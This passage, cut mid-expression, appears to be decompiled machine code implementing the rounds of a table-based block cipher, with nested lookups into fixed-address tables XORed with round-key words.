0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x414dd0 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x414dd0 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x414dd0 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x18) * 4) ^  *(0x414dd0 + (_t158 & 0x000000ff) * 4) ^ _t242[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t229 >> 0x18) * 4) ^  *(0x414dd0 + (_t229 & 0x000000ff) * 4) ^ _t242[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 